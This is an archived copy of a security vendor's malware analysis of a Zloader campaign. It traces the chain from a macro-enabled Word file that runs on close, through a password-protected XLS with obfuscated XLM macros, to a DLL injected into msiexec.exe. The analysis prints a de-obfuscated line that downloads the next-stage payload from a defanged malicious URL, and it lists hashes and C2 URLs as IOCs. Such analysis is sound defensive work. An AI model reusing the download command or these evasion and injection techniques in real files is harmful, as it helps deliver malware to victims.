{
	"id": "f1e6ce77-c865-4195-add8-5491be744ad9",
	"created_at": "2026-04-06T00:08:31.840229Z",
	"updated_at": "2026-04-10T03:20:05.978338Z",
	"deleted_at": null,
	"sha1_hash": "fca84e00271efd3a1d895bbca19d86701c3904ac",
	"title": "Zloader: Entailing Different Office Files - Home",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2543415,
	"plain_text": "Zloader: Entailing Different Office Files - Home\r\nBy Anjali Raut\r\nPublished: 2021-03-23 · Archived: 2026-04-02 10:48:10 UTC\r\nZloader aka Terdot – a variant of the infamous Zeus banking malware is well known for aggressively using “.xls”,\r\n“.xlsx” documents as its initial vector to deliver its payload. Despite this, recently we have come across “.docm”\r\nfile which is being used by Zoader family to perform its initial activity. This shows adversaries like to experiment\r\nwith office documents to avoid being detected by security solutions.\r\n        Fig.1-Attack Chain\r\nInitial Vector:\r\nHere infection chain starts with “.docm” file. Docm stands for “Macro-enabled office word document”. We can\r\nsee below, the document view asking user to enable content.\r\n            Fig.2- Document View\r\nhttps://blogs.quickheal.com/zloader-entailing-different-office-files/\r\nPage 1 of 8\n\nLike many other documents, we tried to observe its activity after enabling content but there was no activity in it.\r\nBy  looking at its VBA code, we got our answer. Enabling content will not do execution of macro. Here macro\r\nexecution  starts on “Document close” as shown.\r\n                 Fig.3- Macro Function Call\r\nAs soon as victim close this document, function “nnn” gets called which is the main function of this VBA macro.\r\nIn this, again sub functions  are being called. Here adversaries also make use of “Userform” to perform next stage\r\nactivity.\r\n              Fig.4- Sub Function Call\r\nUserForm_Initialize() function is used to invoke “Userform2”. Below image shows the userform2 object. In its\r\ndialog box, url data is  chunked and overlapped on 25th ComboBox to hide actual data as shown below.\r\nhttps://blogs.quickheal.com/zloader-entailing-different-office-files/\r\nPage 2 of 8\n\nFig.5- Hidden URL Data\r\nAfter going through all ComboBox of userform2, we were able to locate malicious url which is used to download\r\n2nd stage payload.\r\n         Fig.6- Chunked URL Data\r\nTo sum up above activity, adversaries are making use of for loop to access all these values and create final url as\r\nshown  below,\r\nhttps://blogs.quickheal.com/zloader-entailing-different-office-files/\r\nPage 3 of 8\n\nFig.7- Creation of URL on Document Close\r\nSite “hxxps[:]//feelingfit-always[.]com/1[.]php” which is malicious having score 11 on virus total, is used to\r\ndownload password protected XLS file. Its password is hidden again in VBA macro in “Userform1”. By exploring\r\nuserform1 data,  we were able to extract hidden password.\r\n                        Fig.8- Macro Code to protect XLS with password\r\n                Fig.9- XLS Hidden Password\r\n2nd Stage Payload:\r\nhttps://blogs.quickheal.com/zloader-entailing-different-office-files/\r\nPage 4 of 8\n\nProtecting document with password is classic technique to defend against AV vendors. Correct password is\r\nnecessary to dig further into  analysis. After matching above password, we can finally see excel workbook\r\ncontent. XLM macro is used in “Sheet3” to perform further activity.\r\n      Fig.10- XLS Workbook\r\nHere code is embedded in different cells of document. Below figure shows the extracted macro code from above \r\n workbook:\r\n        Fig.11- XLM Macro Code\r\nHere adversaries make use of excel inbuilt functions like IIF and Switch to obfuscate data. Final de-obfuscated code can be seen as below,\r\n       WinHttp.WinHttpRequest.5.1.open GET https[:]//santarosafuneralhome[.]com/2.php  False\r\n       WinHttp.WinHttpRequest.5.1.SetRequestHeader\r\nhttps://blogs.quickheal.com/zloader-entailing-different-office-files/\r\nPage 5 of 8\n\nWinHttp.WinHttpRequest.5.1.send\r\nAbove malicious url having virus total score 8 is used to download 3rd stage payload of this attack.\r\nFinal Payload Analysis:\r\nThe DLL is the final payload of Zloader. Here the DLL is highly obfuscated and avoids direct calls to the\r\nWindows APIs. Hashing is used to  calculate the addresses and makes the call with the calculated values, making\r\nthe reversing difficult.\r\nFig.12 – Code for address calculation\r\nThe DLL creates process ‘msiexec.exe’, which is a genuine Microsoft process that belongs to Windows\r\nComponent installer, in suspended  mode and injects encrypted file to it.\r\nhttps://blogs.quickheal.com/zloader-entailing-different-office-files/\r\nPage 6 of 8\n\nFig.13- ‘msiexec.exe’ created in suspended mode\r\n                 Fig.14- Encrypted file injected in ‘msiexec.exe’\r\nIt also injects a routine that will decrypt and bring the malicious PE out for execution.\r\n            Fig.15- Decryption Routine\r\nWith the setting of thread context, the initial execution point is passed and finally the injected code is executed\r\nwith the resume thread.\r\nWhen this thread of msiexec.exe comes into execution, it tries to make connection to its CnC servers as shown,\r\nhttps://blogs.quickheal.com/zloader-entailing-different-office-files/\r\nPage 7 of 8\n\nSince these urls were down at the time of analysis, we were not able to go further deeper into it.\r\nConclusion:\r\nThis type of attack shows how adversaries innovate their mechanism to start infection chain to compromise\r\nvictim. User should always be  cautious while opening any office files. Quick Heal and Seqrite enterprise security\r\nsolutions protect its customers from such files. So, remember to keep the endpoint security solutions always\r\nupdated.\r\nIOCs:\r\nDOCM: 117fafb46f27238351f2111e8f01416412044238d2f8378a285063eb9d4eef3d\r\n409ed829f19024045d26cc5d3a06e15a097605e13ba938875eca054a7a4a30b1\r\n91aa050536d834947709776af40c2fde49471d28231de50df0d324cd55101df4\r\nXLS:   52d071922413a3be8815a76118a45bf13d8d323b73ba42377591fd68c59dfc89\r\nURL:\r\nhttps[://]tiodeitidampheater.tk/post.php\r\nhttps[://]actes-etatcivil.com/post.php\r\nhttps[://]ankarakreatif.com/post.php\r\nhttps[://]www.ramazanyildiz.net/post.php\r\nhttps[://]hispaniaeng.com/post.php\r\nhttps[://]www.ifdd.francophonie.org/post.php\r\nSubject Matter Expert:\r\nAnjali Raut\r\nPriyanka Shinde\r\nSource: https://blogs.quickheal.com/zloader-entailing-different-office-files/\r\nhttps://blogs.quickheal.com/zloader-entailing-different-office-files/\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blogs.quickheal.com/zloader-entailing-different-office-files/"
	],
	"report_names": [
		"zloader-entailing-different-office-files"
	],
	"threat_actors": [],
	"ts_created_at": 1775434111,
	"ts_updated_at": 1775791205,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fca84e00271efd3a1d895bbca19d86701c3904ac.pdf",
		"text": "https://archive.orkl.eu/fca84e00271efd3a1d895bbca19d86701c3904ac.txt",
		"img": "https://archive.orkl.eu/fca84e00271efd3a1d895bbca19d86701c3904ac.jpg"
	}
}